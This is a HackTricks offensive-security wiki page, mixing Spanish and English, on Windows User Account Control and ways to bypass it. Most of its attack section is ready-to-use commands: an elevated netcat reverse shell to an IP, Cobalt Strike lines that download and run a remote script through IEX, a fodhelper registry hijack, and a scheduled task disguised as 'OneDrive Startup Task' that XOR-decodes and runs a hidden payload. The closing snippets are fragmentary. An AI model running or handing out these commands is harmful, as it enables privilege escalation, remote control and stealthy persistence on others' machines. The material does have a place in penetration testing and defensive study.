UAC - User Account Control

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Revisa los planes de suscripción!
• Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

UAC

User Account Control (UAC) es una característica que habilita un prompt de consentimiento para actividades elevadas. Las aplicaciones tienen diferentes niveles de integrity, y un programa con un nivel high puede realizar tareas que podrían comprometer potencialmente el sistema. Cuando UAC está habilitado, las aplicaciones y tareas siempre se ejecutan bajo el contexto de seguridad de una cuenta no administradora a menos que un administrador autorice explícitamente que esas aplicaciones/tareas tengan acceso a nivel administrador para ejecutarse. Es una funcionalidad de conveniencia que protege a los administradores de cambios no intencionados, pero no se considera un límite de seguridad.

Para más información sobre los niveles de integrity:

Integrity Levels

Cuando UAC está en funcionamiento, a un usuario administrador se le dan 2 tokens: una clave de usuario estándar, para realizar acciones regulares a nivel normal, y otra con los privilegios de administrador.

Esta page explica en profundidad cómo funciona UAC e incluye el proceso de logon, la experiencia del usuario y la arquitectura de UAC. Los administradores pueden usar políticas de seguridad para configurar cómo funciona UAC específico para su organización a nivel local (usando secpol.msc), o configurarlo y desplegarlo vía Group Policy Objects (GPO) en un entorno de dominio Active Directory. Las distintas configuraciones se describen en detalle here. Hay 10 configuraciones de Group Policy que se pueden establecer para UAC. La siguiente tabla proporciona más detalle:

Políticas para instalar software en Windows

Las políticas de seguridad locales (“secpol.msc” en la mayoría de los sistemas) están configuradas por defecto para impedir que usuarios no administradores realicen instalaciones de software. Esto significa que incluso si un usuario no administrador puede descargar el instalador de tu software, no podrá ejecutarlo sin una cuenta de administrador.

Claves del Registro para forzar que UAC pida elevación

Como usuario estándar sin permisos de administrador, puedes asegurarte de que la cuenta “standard” sea solicitada por UAC para introducir credenciales cuando intente realizar ciertas acciones. Esta acción requeriría modificar ciertas claves del registro, para lo cual necesitas permisos de administrador, a menos que exista un UAC bypass, o el atacante ya esté logueado como admin.

Incluso si el usuario está en el grupo Administrators, estos cambios obligan al usuario a reingresar las credenciales de su cuenta para poder realizar acciones administrativas.

La única desventaja es que este método necesita que UAC esté deshabilitado para funcionar, lo cual es improbable en entornos de producción.

Las claves y entradas del registro que debes cambiar son las siguientes (con sus valores por defecto entre paréntesis):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Esto también se puede hacer manualmente mediante la herramienta Local Security Policy. Una vez cambiadas, las operaciones administrativas solicitan al usuario que reingrese sus credenciales.

Nota

User Account Control is not a security boundary. Por lo tanto, los usuarios estándar no pueden escapar de sus cuentas y obtener derechos de administrador sin un local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

Privilegios de UAC

• Internet Explorer Protected Mode utiliza comprobaciones de integridad para evitar que procesos de alto nivel de integridad (como navegadores web) accedan a datos de bajo nivel de integridad (como la carpeta de archivos temporales de Internet). Esto se consigue ejecutando el navegador con un token de baja integridad. Cuando el navegador intenta acceder a datos almacenados en la zona de baja integridad, el sistema operativo verifica el nivel de integridad del proceso y permite el acceso en consecuencia. Esta característica ayuda a prevenir que ataques de ejecución remota de código obtengan acceso a datos sensibles del sistema.
• Cuando un usuario inicia sesión en Windows, el sistema crea un token de acceso que contiene una lista de los privilegios del usuario. Los privilegios se definen como la combinación de los derechos y capacidades de un usuario. El token también contiene una lista de las credenciales del usuario, que son credenciales que se usan para autenticar al usuario en el equipo y en los recursos de la red.

Autoadminlogon

To configure Windows to automatically log on a specific user at startup, set the AutoAdminLogon registry key. This is useful for kiosk environments or for testing purposes. Use this only on secure systems, as it exposes the password in the registry.

Set the following keys using the Registry Editor or reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

To revert to normal logon behavior, set AutoAdminLogon to 0.

UAC bypass

Tip

Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on “Yes” when the UAC prompt appears

The UAC bypass is needed in the following situation: the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group.

It is important to mention that it is much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).

UAC disabled

If UAC is already disabled (ConsentPromptBehaviorAdmin is 0) you can execute a reverse shell with admin privileges (high integrity level) using something like:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Muy Básico UAC “bypass” (acceso completo al sistema de archivos)

Si tienes una shell con un usuario que está en el grupo Administrators puedes montar el recurso compartido C$ vía SMB (sistema de archivos) localmente en un nuevo disco y tendrás acceso a todo el sistema de archivos (incluso la carpeta personal de Administrator).

Warning

Parece que este truco ya no funciona

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass con cobalt strike

Las técnicas de Cobalt Strike solo funcionarán si UAC no está configurado en su nivel máximo de seguridad

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire y Metasploit también tienen varios módulos para bypass del UAC.

KRBUACBypass

Documentación y herramienta en https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME que es una compilación de varios exploits de bypass de UAC. Ten en cuenta que necesitarás compilar UACME usando visual studio o msbuild. La compilación creará varios ejecutables (como Source\Akagi\outout\x64\Debug\Akagi.exe) , deberás saber cuál necesitas.
Debes tener cuidado porque algunos bypasses harán que otros programas muestren avisos que alertarán al usuario de que algo está ocurriendo.

UACME indica la build a partir de la cual cada técnica empezó a funcionar. Puedes buscar una técnica que afecte tus versiones:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Además, usando this página obtienes la versión de Windows 1607 a partir de los números de compilación.

UAC Bypass – fodhelper.exe (Registry hijack)

El binario de confianza fodhelper.exe se autoeleva en Windows modernos. Al lanzarlo, consulta la ruta de registro por usuario que aparece abajo sin validar el verbo DelegateExecute. Plantar un comando allí permite que un proceso en Medium Integrity (el usuario está en Administrators) inicie un proceso en High Integrity sin un UAC prompt.

Ruta de registro consultada por fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Notas:
- Funciona cuando el usuario actual es miembro de Administrators y el nivel de UAC es predeterminado/permisivo (no Always Notify con restricciones adicionales).
- Usa la ruta `sysnative` para iniciar un PowerShell de 64 bits desde un proceso de 32 bits en Windows de 64 bits.
- El payload puede ser cualquier comando (PowerShell, cmd o la ruta de un EXE). Evita UIs que muestren prompts para mantener el sigilo.

#### CurVer/extension hijack variante (solo HKCU)

Muestras recientes que abusan de `fodhelper.exe` evitan `DelegateExecute` y en su lugar **redirigen el ProgID `ms-settings`** vía el valor por usuario `CurVer`. El binario auto-elevado aún resuelve el manejador bajo `HKCU`, por lo que no se necesita un token de admin para plantar las claves:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"